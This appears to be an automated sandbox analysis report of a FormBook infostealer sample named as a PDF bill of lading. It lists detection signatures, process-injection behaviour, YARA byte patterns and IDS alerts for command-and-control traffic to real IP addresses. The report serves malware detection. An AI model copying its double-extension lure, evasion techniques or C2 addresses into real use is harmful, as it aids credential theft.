Windows Analysis Report
Bill Of Lading_MEDUVB935991.pdf.exe

Overview

General Information

Sample name: Bill Of Lading_MEDUVB935991.pdf.exe
Analysis ID: 1540748
MD5: 0b14ab0ac2f8e44d3f3cfd8fcdbe6d30
SHA1: 15d07797ac7d44d65eb44b00fcaa3c5decd840da
SHA256: fee2d4f0f34f90653abf9827d99da2fc9670fb10e83dbf008cd447ca86e5c418
Tags: exe, Formbook, user-threatcat_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Contains functionality to detect sleep reduction / modifications
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Bill Of Lading_MEDUVB935991.pdf.exe (PID: 2424 cmdline: "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe" MD5: 0B14AB0AC2F8E44D3F3CFD8FCDBE6D30)
    • svchost.exe (PID: 1136 cmdline: "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • gNKNuXuipEBZec.exe (PID: 4624 cmdline: "C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • write.exe (PID: 3608 cmdline: "C:\Windows\SysWOW64\write.exe" MD5: 3D6FDBA2878656FA9ECB81F6ECE45703)
          • gNKNuXuipEBZec.exe (PID: 5568 cmdline: "C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6120 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000006.00000002.4198403561.00000000042A0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | -
00000006.00000002.4198403561.00000000042A0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown | matched strings:
  • 0x2bd50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13f2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.4198331261.0000000005AF0000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | -
00000005.00000002.4198331261.0000000005AF0000.00000040.00000001.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown | matched strings:
  • 0x46049:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x2e228:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000007.00000002.4200186991.00000000050F0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | -
Source | Rule | Description | Author | Strings
1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | -
1.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown | matched strings:
  • 0x2e403:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x165e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
1.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | -
1.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown | matched strings:
  • 0x2f203:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x173e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe", CommandLine: "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe", CommandLine|base64offset|contains: 9, Image: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe, NewProcessName: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe, OriginalFileName: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe", ProcessId: 2424, ProcessName: Bill Of Lading_MEDUVB935991.pdf.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe", CommandLine: "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe", CommandLine|base64offset|contains: 9, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe", ParentImage: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe, ParentProcessId: 2424, ParentProcessName: Bill Of Lading_MEDUVB935991.pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe", ProcessId: 1136, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe", CommandLine: "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe", CommandLine|base64offset|contains: 9, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe", ParentImage: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe, ParentProcessId: 2424, ParentProcessName: Bill Of Lading_MEDUVB935991.pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe", ProcessId: 1136, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-24T05:07:05.833523+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49773 | 3.33.130.190 | 80 | TCP
2024-10-24T05:07:29.719563+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49905 | 75.2.103.23 | 80 | TCP
2024-10-24T05:07:43.225697+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49983 | 161.97.168.245 | 80 | TCP
2024-10-24T05:07:57.197651+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50014 | 65.21.196.90 | 80 | TCP
2024-10-24T05:08:11.307022+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50018 | 107.148.177.200 | 80 | TCP
2024-10-24T05:08:25.369643+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50022 | 91.212.26.5 | 80 | TCP
2024-10-24T05:08:38.749515+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50026 | 3.33.130.190 | 80 | TCP
2024-10-24T05:08:52.838495+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50030 | 154.23.184.194 | 80 | TCP
2024-10-24T05:09:06.409600+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50034 | 63.250.47.57 | 80 | TCP
2024-10-24T05:09:20.182535+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50038 | 104.21.78.104 | 80 | TCP
2024-10-24T05:09:33.834400+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50042 | 68.66.226.116 | 80 | TCP
2024-10-24T05:09:47.242547+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50046 | 13.248.169.48 | 80 | TCP
2024-10-24T05:10:00.778879+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50050 | 3.33.130.190 | 80 | TCP
2024-10-24T05:10:14.590801+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50054 | 3.33.130.190 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-24T05:07:21.863488+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49863 | 75.2.103.23 | 80 | TCP
2024-10-24T05:07:24.527124+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49877 | 75.2.103.23 | 80 | TCP
2024-10-24T05:07:27.053173+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49893 | 75.2.103.23 | 80 | TCP
2024-10-24T05:07:35.644896+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49938 | 161.97.168.245 | 80 | TCP
2024-10-24T05:07:38.176637+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49953 | 161.97.168.245 | 80 | TCP
2024-10-24T05:07:40.713014+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49967 | 161.97.168.245 | 80 | TCP
2024-10-24T05:07:49.416387+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50011 | 65.21.196.90 | 80 | TCP
2024-10-24T05:07:52.010166+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50012 | 65.21.196.90 | 80 | TCP
2024-10-24T05:07:54.566470+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50013 | 65.21.196.90 | 80 | TCP
2024-10-24T05:08:03.685063+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50015 | 107.148.177.200 | 80 | TCP
2024-10-24T05:08:06.229021+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50016 | 107.148.177.200 | 80 | TCP
2024-10-24T05:08:08.776049+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50017 | 107.148.177.200 | 80 | TCP
2024-10-24T05:08:17.697644+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50019 | 91.212.26.5 | 80 | TCP
2024-10-24T05:08:20.260173+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50020 | 91.212.26.5 | 80 | TCP
2024-10-24T05:08:22.822828+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50021 | 91.212.26.5 | 80 | TCP
2024-10-24T05:08:31.105671+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50023 | 3.33.130.190 | 80 | TCP
2024-10-24T05:08:33.649175+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50024 | 3.33.130.190 | 80 | TCP
2024-10-24T05:08:36.207471+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50025 | 3.33.130.190 | 80 | TCP
2024-10-24T05:08:45.117275+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50027 | 154.23.184.194 | 80 | TCP
2024-10-24T05:08:47.744778+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50028 | 154.23.184.194 | 80 | TCP
2024-10-24T05:08:50.291549+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50029 | 154.23.184.194 | 80 | TCP
2024-10-24T05:08:58.751482+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50031 | 63.250.47.57 | 80 | TCP
2024-10-24T05:09:01.315065+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50032 | 63.250.47.57 | 80 | TCP
2024-10-24T05:09:03.869861+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50033 | 63.250.47.57 | 80 | TCP
2024-10-24T05:09:12.550119+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50035 | 104.21.78.104 | 80 | TCP
2024-10-24T05:09:15.127587+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50036 | 104.21.78.104 | 80 | TCP
2024-10-24T05:09:17.648214+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50037 | 104.21.78.104 | 80 | TCP
2024-10-24T05:09:26.712802+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50039 | 68.66.226.116 | 80 | TCP
2024-10-24T05:09:29.234986+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50040 | 68.66.226.116 | 80 | TCP
2024-10-24T05:09:31.780953+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50041 | 68.66.226.116 | 80 | TCP
2024-10-24T05:09:39.598001+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50043 | 13.248.169.48 | 80 | TCP
2024-10-24T05:09:42.147205+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50044 | 13.248.169.48 | 80 | TCP
2024-10-24T05:09:44.660193+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50045 | 13.248.169.48 | 80 | TCP
2024-10-24T05:09:52.918186+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50047 | 3.33.130.190 | 80 | TCP
2024-10-24T05:09:55.447492+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50048 | 3.33.130.190 | 80 | TCP
2024-10-24T05:09:58.025622+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50049 | 3.33.130.190 | 80 | TCP
2024-10-24T05:10:06.450223+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50051 | 3.33.130.190 | 80 | TCP
2024-10-24T05:10:08.993983+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50052 | 3.33.130.190 | 80 | TCP
2024-10-24T05:10:11.549562+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50053 | 3.33.130.190 | 80 | TCP

            AV Detection

Source: Bill Of Lading_MEDUVB935991.pdf.exe | ReversingLabs: Detection: 55%
Source: Bill Of Lading_MEDUVB935991.pdf.exe | Virustotal: Detection: 56%
Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4198403561.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4198331261.0000000005AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4200186991.00000000050F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2196592911.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2197276095.0000000006A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4197079082.00000000023B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4198283199.0000000004110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2195135804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Bill Of Lading_MEDUVB935991.pdf.exe | Joe Sandbox ML: detected
Source: Bill Of Lading_MEDUVB935991.pdf.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: write.pdbGCTL | source: svchost.exe, 00000001.00000002.2196173026.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2196201954.0000000003619000.00000004.00000020.00020000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000005.00000002.4197765799.000000000176E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: write.pdb | source: svchost.exe, 00000001.00000002.2196173026.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2196201954.0000000003619000.00000004.00000020.00020000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000005.00000002.4197765799.000000000176E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: gNKNuXuipEBZec.exe, 00000005.00000002.4197078176.000000000020E000.00000002.00000001.01000000.00000005.sdmp, gNKNuXuipEBZec.exe, 00000007.00000000.2262529578.000000000020E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP | source: Bill Of Lading_MEDUVB935991.pdf.exe, 00000000.00000003.1739800733.00000000048B0000.00000004.00001000.00020000.00000000.sdmp, Bill Of Lading_MEDUVB935991.pdf.exe, 00000000.00000003.1739474867.0000000004710000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2196687100.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2094619332.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2092717586.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2196687100.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000002.4198585467.000000000469E000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000002.4198585467.0000000004500000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000003.2195652976.00000000041AF000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000003.2197425924.0000000004352000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: Bill Of Lading_MEDUVB935991.pdf.exe, 00000000.00000003.1739800733.00000000048B0000.00000004.00001000.00020000.00000000.sdmp, Bill Of Lading_MEDUVB935991.pdf.exe, 00000000.00000003.1739474867.0000000004710000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2196687100.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2094619332.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2092717586.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2196687100.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, write.exe, write.exe, 00000006.00000002.4198585467.000000000469E000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000002.4198585467.0000000004500000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000003.2195652976.00000000041AF000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000003.2197425924.0000000004352000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb | source: write.exe, 00000006.00000002.4197383900.0000000002885000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.4199021096.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000007.00000002.4198548934.0000000002CBC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2482548327.0000000037CAC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP | source: write.exe, 00000006.00000002.4197383900.0000000002885000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.4199021096.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000007.00000002.4198548934.0000000002CBC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2482548327.0000000037CAC000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose | 0_2_00452126
Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose | 0_2_0045C999
Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose | 0_2_00436ADE
Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00434BEE
Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle | 0_2_00436D2D
Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00442E1F
Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_0045DD7C FindFirstFileW,FindClose | 0_2_0045DD7C
Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose | 0_2_0044BD29
Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf | 0_2_00475FE5
Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_0044BF8D
Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_023CC300 FindFirstFileW,FindNextFileW,FindClose | 6_2_023CC300
Source: C:\Windows\SysWOW64\write.exe | Code function: 4x nop then mov dword ptr [ebp-5Ch], 00000000h | 6_2_023B9BF0
Source: C:\Windows\SysWOW64\write.exe | Code function: 4x nop then xor eax, eax | 6_2_023B9BF0
Source: C:\Windows\SysWOW64\write.exe | Code function: 4x nop then mov ebx, 00000004h | 6_2_043A04DE

            Networking

            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49773 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49893 -> 75.2.103.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49877 -> 75.2.103.23:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49905 -> 75.2.103.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49863 -> 75.2.103.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50011 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50016 -> 107.148.177.200:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50014 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50030 -> 154.23.184.194:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 91.212.26.5:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 104.21.78.104:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50012 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 63.250.47.57:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50050 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 91.212.26.5:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50013 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50015 -> 107.148.177.200:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50038 -> 104.21.78.104:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50051 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50042 -> 68.66.226.116:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50026 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50046 -> 13.248.169.48:80
